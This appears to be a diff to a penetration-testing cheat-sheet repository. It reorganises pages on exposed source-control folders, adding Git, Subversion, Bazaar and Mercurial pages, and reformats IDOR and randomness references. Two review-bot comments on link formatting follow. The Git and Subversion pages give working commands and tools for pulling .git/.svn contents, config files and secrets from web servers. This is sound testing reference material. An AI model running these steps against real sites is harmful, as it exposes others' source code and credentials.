diff --git a/Insecure Direct Object References/README.md b/Insecure Direct Object References/README.md index d86b2f7..cba097d 100644 --- a/Insecure Direct Object References/README.md +++ b/Insecure Direct Object References/README.md @@ -26,7 +26,7 @@ ## Labs -* [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references) +- [PortSwigger - Insecure Direct Object References](https://portswigger.net/web-security/access-control/lab-insecure-direct-object-references) ## Exploit 
@@ -132,13 +132,13 @@ Send a wildcard (`*`, `%`, `.`, `_`) instead of an ID, some backend might respon ## References -* [OWASP - Testing for Insecure Direct Object References (OTG-AUTHZ-004)](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)) -* [OWASP - Insecure Direct Object Reference Prevention Cheat Sheet](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet) -* [BUGCROWD - How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/) -* [Manipulation of ETH balance](https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) -* [Viewing private Airbnb Messages](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) -* [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - Feb 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782) -* [IDOR - how to predict an identifier? 
Bug bounty case study - Bug Bounty Reports Explained - ](https://youtu.be/wx5TwS0Dres) -* [Testing for IDORs - PortSwigger](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors) -* [Insecure direct object references (IDOR) - PortSwigger](https://portswigger.net/web-security/access-control/idor) -* [The Rise of IDOR - HackerOne - April 2nd, 2021](https://www.hackerone.com/company-news/rise-idor) \ No newline at end of file +- [From Christmas present in the blockchain to massive bug bounty - Jesse Lakerveld - March 21, 2018](http://web.archive.org/web/20180401130129/https://www.vicompany.nl/magazine/from-christmas-present-in-the-blockchain-to-massive-bug-bounty) +- [How-To: Find IDOR (Insecure Direct Object Reference) Vulnerabilities for large bounty rewards - Sam Houton - November 9, 2017](https://www.bugcrowd.com/blog/how-to-find-idor-insecure-direct-object-reference-vulnerabilities-for-large-bounty-rewards/) +- [Hunting Insecure Direct Object Reference Vulnerabilities for Fun and Profit (PART-1) - Mohammed Abdul Raheem - February 2, 2018](https://codeburst.io/hunting-insecure-direct-object-reference-vulnerabilities-for-fun-and-profit-part-1-f338c6a52782) +- [IDOR - how to predict an identifier? 
Bug bounty case study - Bug Bounty Reports Explained - September 21, 2023](https://youtu.be/wx5TwS0Dres) +- [Insecure Direct Object Reference Prevention Cheat Sheet - OWASP - July 31, 2023](https://www.owasp.org/index.php/Insecure_Direct_Object_Reference_Prevention_Cheat_Sheet) +- [Insecure direct object references (IDOR) - PortSwigger - December 25, 2019](https://portswigger.net/web-security/access-control/idor) +- [Testing for IDORs - PortSwigger - October 29, 2024](https://portswigger.net/burp/documentation/desktop/testing-workflow/access-controls/testing-for-idors) +- [Testing for Insecure Direct Object References (OTG-AUTHZ-004) - OWASP - August 8, 2014](https://www.owasp.org/index.php/Testing_for_Insecure_Direct_Object_References_(OTG-AUTHZ-004)) +- [The Rise of IDOR - HackerOne - April 2, 2021](https://www.hackerone.com/company-news/rise-idor) +- [Web to App Phone Notification IDOR to view Everyone's Airbnb Messages - Brett Buerhaus - March 31, 2017](http://buer.haus/2017/03/31/airbnb-web-to-app-phone-notification-idor-to-view-everyones-airbnb-messages/) \ No newline at end of file diff --git a/Insecure Management Interface/README.md b/Insecure Management Interface/README.md index 2c7bb95..8f8cdf9 100644 --- a/Insecure Management Interface/README.md +++ b/Insecure Management Interface/README.md @@ -1,5 +1,12 @@ # Insecure Management Interface +## Summary + +* [Springboot-Actuator](#springboot-actuator) + * [Remote Code Execution via /env](#remote-code-execution-via-env) +* [References](#references) + + ## Springboot-Actuator Actuator endpoints let you monitor and interact with your application. 
@@ -88,7 +95,8 @@ Content-Type: application/x-www-form-urlencoded Content-Length: 0 ``` + ## References -* [Springboot - Official Documentation](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) -* [Exploiting Spring Boot Actuators - Veracode](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators) +- [Exploiting Spring Boot Actuators - Michael Stepankin - Feb 25, 2019](https://www.veracode.com/blog/research/exploiting-spring-boot-actuators) +- [Springboot - Official Documentation - May 9, 2024](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-endpoints.html) \ No newline at end of file diff --git a/Insecure Randomness/README.md b/Insecure Randomness/README.md index c409ae8..6a8cc01 100644 --- a/Insecure Randomness/README.md +++ b/Insecure Randomness/README.md 
@@ -166,10 +166,10 @@ Generic identification and sandwitch attack: ## References -* [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust) -* [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/) -* [[FR] Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html) -* [[EN] Unsecure time-based secret and Sandwich Attack - Analysis of my research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD / @AethliosIK - 2 apr 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html) -* [Secret non sécurisé basé sur le temps et attaques par sandwich - Tom CHAMBARETAUD aka Aethlios](#) -* [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - Oct 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01) -* [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - 06 January, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction) \ No newline at end of file +- [In GUID We Trust - Daniel Thatcher - October 11, 2022](https://www.intruder.io/research/in-guid-we-trust) +- [IDOR through MongoDB Object IDs Prediction - Amey Anekar - August 25, 2020](https://techkranti.com/idor-through-mongodb-object-ids-prediction/) +- [Secret basé sur le temps non sécurisé et attaque par sandwich - Analyse de mes recherches et publication de l’outil “Reset Tolkien” - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-fr.html) *(FR)* +- [Unsecure time-based secret and Sandwich Attack - Analysis of my 
research and release of the “Reset Tolkien” tool - Tom CHAMBARETAUD (@AethliosIK) - April 2, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html) *(EN)* +- [Multi-sandwich attack with MongoDB Object ID or the scenario for real-time monitoring of web application invitations: a new use case for the sandwich attack - Tom CHAMBARETAUD (@AethliosIK) - July 18, 2024](https://www.aeth.cc/public/Article-Reset-Tolkien/multi-sandwich-article-en.html) +- [Exploiting Weak Pseudo-Random Number Generation in PHP’s rand and srand Functions - Jacob Moore - October 18, 2023](https://medium.com/@moorejacob2017/exploiting-weak-pseudo-random-number-generation-in-phps-rand-and-srand-functions-445229b83e01) +- [Breaking PHP's mt_rand() with 2 values and no bruteforce - Charles Fol - January 6, 2020](https://www.ambionics.io/blog/php-mt-rand-prediction) \ No newline at end of file diff --git a/Insecure Source Code Management/Bazaar.md b/Insecure Source Code Management/Bazaar.md new file mode 100644 index 0000000..26a9aca --- /dev/null +++ b/Insecure Source Code Management/Bazaar.md 
@@ -0,0 +1,47 @@ +# Bazaar + +## Summary + +* [Tools](#tools) + * [rip-bzr.pl](#rip-bzrpl) + * [bzr_dumper](#bzr_dumper) +* [References](#references) + + +## Tools + +### rip-bzr.pl + +```powershell +wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl +docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u +``` + +### bzr_dumper + +```powershell +git clone https://github.com/SeahunOh/bzr_dumper +python3 dumper.py -u "http://127.0.0.1:5000/" -o source +Created a standalone tree (format: 2a) +[!] Target : http://127.0.0.1:5000/ +[+] Start. +[+] GET repository/pack-names +[+] GET README +[+] GET checkout/dirstate +[+] GET checkout/views +[+] GET branch/branch.conf +[+] GET branch/format +[+] GET branch/last-revision +[+] GET branch/tag +[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1' +[*] Finish + +$ bzr revert + N application.py + N database.py + N static/ +``` + +## References + +- [STEM CTF Cyber Challenge 2019 – My First Blog - m3ssap0 / zuzzur3ll0n1 - March 2, 2019](https://ctftime.org/writeup/13380) \ No newline at end of file diff --git a/Insecure Source Code Management/Git.md b/Insecure Source Code Management/Git.md new file mode 100644 index 0000000..327920d --- /dev/null +++ b/Insecure Source Code Management/Git.md 
@@ -0,0 +1,221 @@ +# Git + +## Summary + +* [Example](#example) + * [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead) + * [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex) +* [Tools](#tools) +* [Automatic recovery](#automatic-recovery) + * [git-dumper.py](#git-dumperpy) + * [diggit.py](#diggitpy) + * [GoGitDumper](#gogitdumper) + * [rip-git](#rip-git) + * [GitHack](#githack) + * [GitTools](#gittools) +* [Harvesting secrets](#harvesting-secrets) + * [trufflehog](#trufflehog) + * [Yar](#yar) + * [Gitrob](#gitrob) + * [Gitleaks](#gitleaks) +* [Refererences] + + +## Example + +The following examples will create either a copy of the .git or a copy of the current commit. + +Check for the following files, if they exist you can extract the .git folder. + +- .git/config +- .git/HEAD +- .git/logs/HEAD + +### Recovering file contents from .git/logs/HEAD + +1. Check for 403 Forbidden or directory listing to find the `/.git/` directory +2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too) + ```powershell + 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git + 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael 1489390329 +0000 commit: Initial. + 26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael 1489390330 +0000 commit: Whoops! Remove flag. + 6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael 1489390332 +0000 commit: Prevent directory listing. + ``` +3. 
Access the commit using the hash + ```powershell + # create an empty .git repository + git init test + cd test/.git + + # download the file + wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c + + # first byte for subdirectory, remaining bytes for filename + mkdir .git/object/26 + mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/ + + # display the file + git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c + tree 323240a3983045cdc0dec2e88c1358e7998f2e39 + parent 15ca375e54f056a576905b41a417b413c57df6eb + author Michael 1489390329 +0000 + committer Michael 1489390329 +0000 + Initial. + ``` +4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39 + ```powershell + wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39 + mkdir .git/object/32 + mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/ + + git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39 + 040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css + 100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt + 040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts + 100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html + 040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js + ``` +5. Read the data (flag.txt) + ```powershell + wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f + mkdir .git/object/cb + mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/ + git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f + ``` + +### Recovering file contents from .git/index + +Use the git index file parser https://pypi.python.org/pypi/gin (python3). + +```powershell +pip3 install gin +gin ~/git-repo/.git/index +``` + +Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file. 
+ +```powershell +$ gin .git/index | egrep -e "name|sha1" +name = AWS Amazon Bucket S3/README.md +sha1 = 862a3e58d138d6809405aa062249487bee074b98 + +name = CRLF injection/README.md +sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 +``` + +## Tools + +### Automatic recovery + +#### git-dumper.py + +```powershell +git clone https://github.com/arthaud/git-dumper +pip install -r requirements.txt +./git-dumper.py http://web.site/.git ~/website +``` + +#### diggit.py + +```powershell +git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit +./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True] +./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1 + +-u is remote path, where .git folder exists +-t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init) +-o is a hash of particular Git object to download +``` + +#### GoGitDumper + +```powershell +go get github.com/c-sto/gogitdumper +gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/ +git log +git checkout +``` + +#### rip-git + +```powershell +git clone https://github.com/kost/dvcs-ripper +perl rip-git.pl -v -u "http://web.site/.git/" + +git cat-file -p 07603070376d63d911f608120eb4b5489b507692 +tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 +parent 15ca375e54f056a576905b41a417b413c57df6eb +author Michael 1489389105 +0000 +committer Michael 1489389105 +0000 + +git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 +``` + +#### GitHack + +```powershell +git clone https://github.com/lijiejie/GitHack +GitHack.py http://web.site/.git/ +``` + +#### GitTools + +```powershell +git clone https://github.com/internetwache/GitTools +./gitdumper.sh http://target.tld/.git/ /tmp/destdir +git checkout -- . 
+``` + +### Harvesting secrets + +#### trufflehog + +> Searches through git repositories for high entropy strings and secrets, digging deep into commit history. + +```powershell +pip install truffleHog # https://github.com/dxa4481/truffleHog +truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git +``` + +#### Yar + +> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog. + +```powershell +go get github.com/nielsing/yar # https://github.com/nielsing/yar +yar -o orgname --both +``` + +#### Gitrob + +> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. + +```powershell +go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob +export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef +gitrob [options] target [target2] ... [targetN] +``` + +#### Gitleaks + +> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories. + +```powershell +# Run gitleaks against a public repository +docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git + +# Run gitleaks against a local repository already cloned into /tmp/ +docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks + +# Run gitleaks against a specific Github Pull request +docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000 + +or + +go get -u github.com/zricethezav/gitleaks +``` + + +## References + +- [Gitrob: Now in Go - Michael Henriksen - January 24, 2024](https://michenriksen.com/blog/gitrob-now-in-go/) 
diff --git a/Insecure Source Code Management/Mercurial.md b/Insecure Source Code Management/Mercurial.md new file mode 100644 index 0000000..5080b6b --- /dev/null +++ b/Insecure Source Code Management/Mercurial.md @@ -0,0 +1,22 @@ +# Mercurial + +## Summary + +* [Tools](#tools) + * [rip-hg.pl](#rip-hgpl) +* [References](#references) + + +## Tools + +### rip-hg.pl + +* [kost/dvcs-ripper/master/rip-hg.pl](https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl) - Rip web accessible (distributed) version control systems: SVN/GIT/HG... + ```powershell + docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u + ``` + + +## References + +* [my-chemical-romance - siunam - Feb 13, 2023](https://siunam321.github.io/ctf/LA-CTF-2023/Web/my-chemical-romance/) \ No newline at end of file diff --git a/Insecure Source Code Management/README.md b/Insecure Source Code Management/README.md index cfe5cb9..a3be5d4 100644 --- a/Insecure Source Code Management/README.md +++ b/Insecure Source Code Management/README.md 
@@ -1,308 +1,46 @@ # Insecure Source Code Management -* [Git](#git) - * [Example](#example) - * [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead) - * [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex) - * [Tools](#tools) - * [Automatic recovery](#automatic-recovery) - * [git-dumper.py](#git-dumperpy) - * [diggit.py](#diggitpy) - * [GoGitDumper](#gogitdumper) - * [rip-git](#rip-git) - * [GitHack](#githack) - * [GitTools](#gittools) - * [Harvesting secrets](#harvesting-secrets) - * [trufflehog](#trufflehog) - * [Yar](#yar) - * [Gitrob](#gitrob) - * [Gitleaks](#gitleaks) -* [Subversion](#subversion) - * [Example (Wordpress)](#example-wordpress) - * [Tools](#tools-1) - * [svn-extractor](#svn-extractor) -* [Bazaar](#bazaar) - * [Tools](#tools-2) - * [rip-bzr.pl](#rip-bzrpl) - * [bzr_dumper](#bzr_dumper) -* [Mercurial](#mercurial) - * [Tools](#tools-3) - * [rip-hg.pl](#rip-hgpl) -* [References](#references) +Insecure Source Code Management (SCM) can lead to several critical vulnerabilities in web applications and services. Developers often rely on SCM systems like Git and Subversion (SVN) to manage their source code versions. However, poor security practices, such as leaving .git and .svn folders in production environments exposed to the internet, can pose significant risks. -## Git -The following examples will create either a copy of the .git or a copy of the current commit. +## Summary -Check for the following files, if they exist you can extract the .git folder. +* [Bazaar](./Bazaar.md) +* [Git](./Git.md) +* [Mercurial](./Mercurial.md) +* [Subversion](./Subversion.md) +* [Methodology](#methodology) -- .git/config -- .git/HEAD -- .git/logs/HEAD -### Example +## Methodology -#### Recovering file contents from .git/logs/HEAD +Exposing the version control system folders on a web server can lead to severe security risks, including: -1. 
Check for 403 Forbidden or directory listing to find the `/.git/` directory -2. Git saves all information in `.git/logs/HEAD` (try lowercase `head` too) - ```powershell - 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root 1455532500 +0000 clone: from https://github.com/fermayo/hello-world-lamp.git - 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael 1489390329 +0000 commit: Initial. - 26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael 1489390330 +0000 commit: Whoops! Remove flag. - 6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael 1489390332 +0000 commit: Prevent directory listing. - ``` -3. Access the commit using the hash - ```powershell - # create an empty .git repository - git init test - cd test/.git +- **Source Code Leaks** : Attackers can download the entire source code repository, gaining access to the application's logic. +- **Sensitive Information Exposure** : Embedded secrets, configuration files, and credentials might be present within the codebase. +- **Commit History Exposure** : Attackers can view past changes, revealing sensitive information that might have been previously exposed and later mitigated. + - # download the file - wget http://web.site/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c +The first step is to gather information about the target application. This can be done using various web reconnaissance tools and techniques. - # first byte for subdirectory, remaining bytes for filename - mkdir .git/object/26 - mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/ +* **Manual Inspection** : Check URLs manually by navigating to common SCM paths. + * http://target.com/.git/ + * http://target.com/.svn/ +* **Automated Tools** : Refer to the page related to the specific technology. 
- # display the file - git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c - tree 323240a3983045cdc0dec2e88c1358e7998f2e39 - parent 15ca375e54f056a576905b41a417b413c57df6eb - author Michael 1489390329 +0000 - committer Michael 1489390329 +0000 - Initial. - ``` -4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39 - ```powershell - wget http://web.site/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39 - mkdir .git/object/32 - mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/ +Once a potential SCM folder is identified, check the HTTP response codes and contents. You might need to bypass `.htaccess` or Reverse Proxy rules. - git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39 - 040000 tree bd083286051cd869ee6485a3046b9935fbd127c0 css - 100644 blob cb6139863967a752f3402b3975e97a84d152fd8f flag.txt - 040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97 fonts - 100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1 index.html - 040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8 js - ``` -5. Read the data (flag.txt) - ```powershell - wget http://web.site/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f - mkdir .git/object/cb - mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/ - git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f - ``` +The NGINX rule below returns a `403 (Forbidden)` response instead of `404 (Not Found)` when hitting the `/.git` endpoint. -#### Recovering file contents from .git/index - -Use the git index file parser https://pypi.python.org/pypi/gin (python3). - -```powershell -pip3 install gin -gin ~/git-repo/.git/index +```ps1 +location /.git { + deny all; +} ``` -Recover name and sha1 hash of every file listed in the index, and use the same process above to recover the file. +For example in Git, the exploitation technique doesn't require to list the content of the `.git` folder (http://target.com/.git/), the data extraction can still be conducted when files can be read. 
-```powershell -$ gin .git/index | egrep -e "name|sha1" -name = AWS Amazon Bucket S3/README.md -sha1 = 862a3e58d138d6809405aa062249487bee074b98 - -name = CRLF injection/README.md -sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 -``` - -### Tools - -#### Automatic recovery - -##### git-dumper.py - -```powershell -git clone https://github.com/arthaud/git-dumper -pip install -r requirements.txt -./git-dumper.py http://web.site/.git ~/website -``` - -##### diggit.py - -```powershell -git clone https://github.com/bl4de/security-tools/ && cd security-tools/diggit -./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True] -./diggit.py -u http://web.site -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1 - --u is remote path, where .git folder exists --t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init) --o is a hash of particular Git object to download -``` - -##### GoGitDumper - -```powershell -go get github.com/c-sto/gogitdumper -gogitdumper -u http://web.site/.git/ -o yourdecideddir/.git/ -git log -git checkout -``` - -##### rip-git - -```powershell -git clone https://github.com/kost/dvcs-ripper -perl rip-git.pl -v -u "http://web.site/.git/" - -git cat-file -p 07603070376d63d911f608120eb4b5489b507692 -tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 -parent 15ca375e54f056a576905b41a417b413c57df6eb -author Michael 1489389105 +0000 -committer Michael 1489389105 +0000 - -git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2 -``` - -##### GitHack - -```powershell -git clone https://github.com/lijiejie/GitHack -GitHack.py http://web.site/.git/ -``` - -##### GitTools - -```powershell -git clone https://github.com/internetwache/GitTools -./gitdumper.sh http://target.tld/.git/ /tmp/destdir -git checkout -- . 
-``` - -#### Harvesting secrets - -##### trufflehog - -> Searches through git repositories for high entropy strings and secrets, digging deep into commit history. - -```powershell -pip install truffleHog # https://github.com/dxa4481/truffleHog -truffleHog --regex --entropy=False https://github.com/dxa4481/truffleHog.git -``` - -##### Yar - -> Searches through users/organizations git repositories for secrets either by regex, entropy or both. Inspired by the infamous truffleHog. - -```powershell -go get github.com/nielsing/yar # https://github.com/nielsing/yar -yar -o orgname --both -``` - -##### Gitrob - -> Gitrob is a tool to help find potentially sensitive files pushed to public repositories on Github. Gitrob will clone repositories belonging to a user or organization down to a configurable depth and iterate through the commit history and flag files that match signatures for potentially sensitive files. - -```powershell -go get github.com/michenriksen/gitrob # https://github.com/michenriksen/gitrob -export GITROB_ACCESS_TOKEN=deadbeefdeadbeefdeadbeefdeadbeefdeadbeef -gitrob [options] target [target2] ... [targetN] -``` - -##### Gitleaks - -> Gitleaks provides a way for you to find unencrypted secrets and other unwanted data types in git source code repositories. 
- -```powershell -# Run gitleaks against a public repository -docker run --rm --name=gitleaks zricethezav/gitleaks -v -r https://github.com/zricethezav/gitleaks.git - -# Run gitleaks against a local repository already cloned into /tmp/ -docker run --rm --name=gitleaks -v /tmp/:/code/ zricethezav/gitleaks -v --repo-path=/code/gitleaks - -# Run gitleaks against a specific Github Pull request -docker run --rm --name=gitleaks -e GITHUB_TOKEN={your token} zricethezav/gitleaks --github-pr=https://github.com/owner/repo/pull/9000 - -or - -go get -u github.com/zricethezav/gitleaks -``` - -## Subversion - -### Example (Wordpress) - -```powershell -curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base -``` - -1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db - ```powershell - INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL); - ``` -2. Download interesting files - * remove \$sha1\$ prefix - * add .svn-base postfix - * use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case) - * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base` - - -### Tools - -#### svn-extractor - -```powershell -git clone https://github.com/anantshri/svn-extractor.git -python svn-extractor.py –url "url with .svn available" -``` - -## Bazaar - -### Tools - -#### rip-bzr.pl - -```powershell -wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-bzr.pl -docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-bzr.pl -v -u -``` - -#### bzr_dumper - -```powershell -git clone https://github.com/SeahunOh/bzr_dumper -python3 dumper.py -u "http://127.0.0.1:5000/" -o source -Created a standalone tree (format: 2a) -[!] 
Target : http://127.0.0.1:5000/ -[+] Start. -[+] GET repository/pack-names -[+] GET README -[+] GET checkout/dirstate -[+] GET checkout/views -[+] GET branch/branch.conf -[+] GET branch/format -[+] GET branch/last-revision -[+] GET branch/tag -[+] GET b'154411f0f33adc3ff8cfb3d34209cbd1' -[*] Finish - -$ bzr revert - N application.py - N database.py - N static/ -``` - -## Mercurial - -### Tools - -#### rip-hg.pl - -```powershell -wget https://raw.githubusercontent.com/kost/dvcs-ripper/master/rip-hg.pl -docker run --rm -it -v /path/to/host/work:/work:rw k0st/alpine-dvcs-ripper rip-hg.pl -v -u -``` ## References -- [bl4de, hidden_directories_leaks](https://github.com/bl4de/research/tree/master/hidden_directories_leaks) -- [bl4de, diggit](https://github.com/bl4de/security-tools/tree/master/diggit) -- [Gitrob: Now in Go - Michael Henriksen](https://michenriksen.com/blog/gitrob-now-in-go/) +- [Hidden directories and files as a source of sensitive information about web application - Apr 30, 2017](https://github.com/bl4de/research/tree/master/hidden_directories_leaks) \ No newline at end of file diff --git a/Insecure Source Code Management/Subversion.md b/Insecure Source Code Management/Subversion.md new file mode 100644 index 0000000..222ff63 --- /dev/null +++ b/Insecure Source Code Management/Subversion.md 
@@ -0,0 +1,40 @@ +# Subversion + +## Summary + +* [Examples](#examples) +* [Tools](#tools) + * [svn-extractor](#svn-extractor) +* [References](#references) + + +## Examples + +```powershell +curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base +``` + +1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db + ```powershell + INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL); + ``` +2. Download interesting files + * remove \$sha1\$ prefix + * add .svn-base postfix + * use first byte from hash as a subdirectory of the `pristine/` directory (`94` in this case) + * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base` + + +## Tools + +### svn-extractor + +* [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network. + ```powershell + python svn-extractor.py --url "url with .svn available" + ``` + + +## References + +- [SVN Extractor for Web Pentesters - Anant Shrivastava - March 26, 2013](http://blog.anantshri.info/svn-extractor-for-web-pentesters/) \ No newline at end of file
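Review bot: In `Insecure Direct Object References/README.md`, the References hunk swaps the vicompany link for a `web.archive.org` snapshot but leaves both OWASP entries on the old `https://www.owasp.org/index.php/...` wiki paths, now with publication dates attached. Please confirm those two URLs still resolve to the cited pages, or give them the same archived-link treatment. The file also still ends with `\ No newline at end of file`; adding the trailing newline in this change avoids a spurious diff line the next time the list is extended.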
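Review bot: In `Insecure Management Interface/README.md`, the new reference `Springboot - Official Documentation - May 9, 2024` attaches a fixed date to a `/docs/current/` URL, which will serve different content as releases move. Link a versioned documentation path or drop the date. The other new entry uses `Feb 25, 2019`, while this same patch rewrites `Oct 18, 2023` to `October 18, 2023` in `Insecure Randomness/README.md`, so the month should be spelled out here too.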
